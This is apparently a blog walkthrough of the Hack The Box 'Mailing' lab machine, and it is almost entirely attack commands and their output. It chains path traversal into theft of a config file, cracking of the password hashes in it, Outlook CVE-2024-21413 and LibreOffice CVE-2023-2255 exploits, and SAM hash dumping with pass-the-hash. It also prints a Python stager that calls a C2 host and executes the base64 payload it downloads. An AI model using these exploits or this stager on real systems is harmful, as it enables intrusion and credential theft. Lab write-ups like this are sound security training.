TCP Scan

> TARGET=10.129.58.123 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT      STATE SERVICE       REASON          VERSION
25/tcp    open  smtp          syn-ack ttl 127 hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Mailing
|_http-server-header: Microsoft-IIS/10.0
110/tcp   open  pop3          syn-ack ttl 127 hMailServer pop3d
|_pop3-capabilities: USER TOP UIDL
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
143/tcp   open  imap          syn-ack ttl 127 hMailServer imapd
|_imap-capabilities: SORT IMAP4 completed CHILDREN OK QUOTA CAPABILITY RIGHTS=texkA0001 IDLE NAMESPACE ACL IMAP4rev1
445/tcp   open  microsoft-ds? syn-ack ttl 127
465/tcp   open  ssl/smtp      syn-ack ttl 127 hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp   open  smtp          syn-ack ttl 127 hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
993/tcp   open  ssl/imap      syn-ack ttl 127 hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
|_imap-capabilities: SORT IMAP4 completed CHILDREN OK QUOTA CAPABILITY RIGHTS=texkA0001 IDLE NAMESPACE ACL IMAP4rev1
5040/tcp  open  unknown       syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?    syn-ack ttl 127
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

• add hostname

echo '10.129.58.123    mailing.htb' >> /etc/hosts

• note: ruy@mailing.htb

web enum

> dirsearch -u http://mailing.htb -x 403,404
[23:04:53] 301 -  160B  - /assets  ->  http://mailing.htb/assets/
[23:04:53] 200 -  541B  - /assets/
[23:05:08] 200 -   31B  - /download.php

• find accepted parameters

> wfuzz -w /usr/share/wordlists/dirb/common.txt -u "http://mailing.htb/download.php?FUZZ=test" --hh 31
000001601:   200        0 L      3 W        15 Ch       "file"

> wfuzz -w /usr/share/wordlists/Bug-Bounty-Wordlists/windows-lfi.txt -u "http://mailing.htb/download.php?file=../../../FUZZ" --hh 15
lots of result

hmailserver

• from the homepage, learnt there is a hmailserver application installed (read the pdf)
• also note the name maya
• search for hmailserver directory structure and locate the config file

curl -i "http://mailing.htb/download.php?file=../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.INI"
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Pragma: public
Content-Type: application/octet-stream
Expires: 0
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.3.3
Content-Description: File Transfer
Content-Disposition: attachment; filename="hMailServer.INI"
X-Powered-By: ASP.NET
Date: Mon, 06 May 2024 03:24:18 GMT
Content-Length: 604

[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

• crack 841bb5acfa6779ae432fd7a4e6600ba7: homenetworkingadministrator

• decrypt the hmail password

┌──(root㉿kali)-[~/workspace/Mailing]
└─# git clone https://github.com/GitMirar/hMailDatabasePasswordDecrypter.git
Cloning into 'hMailDatabasePasswordDecrypter'...
remote: Enumerating objects: 8, done.
remote: Total 8 (delta 0), reused 0 (delta 0), pack-reused 8
Receiving objects: 100% (8/8), 9.53 KiB | 3.17 MiB/s, done.

┌──(root㉿kali)-[~/workspace/Mailing]
└─# cd hMailDatabasePasswordDecrypter

┌──(root㉿kali)-[~/workspace/Mailing/hMailDatabasePasswordDecrypter]
└─# make
g++ blowfish.cpp main.cpp -o decrypt

┌──(root㉿kali)-[~/workspace/Mailing/hMailDatabasePasswordDecrypter]
└─# ./decrypt 0a9f8ad8bf896b501dde74f08efd7e4c
6FC6F69152AD

CVE-2024-21413

• login and check users

> telnet mailing.htb 25
USER administrator@mailing.htb
PASS homenetworkingadministrator
LIST
RETR 1

• https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability?tab=readme-ov-file

> python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.19' --subject XD

user

┌──(root㉿kali)-[~/workspace/Mailing]
└─# evil-winrm -i mailing.htb -u maya -p m4y4ngs4ri

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> type c:\users\maya\desktop\user.txt
cacd4192e46fd7b53cc5f29d083d1a88

• create a e.py and upload to target’s C:\Users\maya\desktop\e.py

import socket
import ssl
import os
import threading
import time
import zlib
import base64
import struct
c2 = '10.10.14.x'
port = 4444
context=ssl._create_unverified_context()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
    with context.wrap_socket(sock, server_hostname=c2) as ssock:
        ssock.connect((c2, port))
        sent = struct.unpack('>I',ssock.recv(12000))[0]
        payload = ssock.recv(sent)
        while len(payload) < sent:
            payload += ssock.recv(sent-len(payload))
        exec(zlib.decompress(base64.b64decode(payload)), {'s':ssock})

• on kali, generate the payload test.odt and upload to c:\Important Documents\test.odt

> python3 CVE-2023-2255.py --cmd 'python C:\Users\maya\desktop\e.py' --output "test.odt"
File test.odt has been created !

• on target

> wget http://10.10.14.19/test.odt -O "c:\Important Documents\test.odt"

• on kali

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp

• above is not very smooth to use, try below

# kali
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'

# target
wget http://10.10.14.19/exploit.odt -O "c:\Important Documents\exploit.odt"

• check

net user maya
User name                    maya
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2024-04-12 4:16:20 AM
Password expires             Never
Password changeable          2024-04-12 4:16:20 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2024-05-06 6:21:53 AM

Logon hours allowed          All

Local Group Memberships      *Administradores      *Remote Management Use
                             *Usuarios             *Usuarios de escritori
Global Group memberships     *Ninguno
The command completed successfully.


> crackmapexec smb mailing.htb -u maya -p "m4y4ngs4ri" --sam
[*] Initializing FTP protocol database
SMB         mailing.htb     445    MAILING          [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         mailing.htb     445    MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB         mailing.htb     445    MAILING          [+] Dumping SAM hashes
SMB         mailing.htb     445    MAILING          Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         mailing.htb     445    MAILING          Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         mailing.htb     445    MAILING          DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         mailing.htb     445    MAILING          WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB         mailing.htb     445    MAILING          localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB         mailing.htb     445    MAILING          maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB         mailing.htb     445    MAILING          [+] Added 6 SAM hashes to the database

> impacket-wmiexec localadmin@mailing.htb -hashes "aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae"
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type c:\users\localadmin\desktop\root.txt
a4e7847b41fd418331a4e1585c3fea60

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack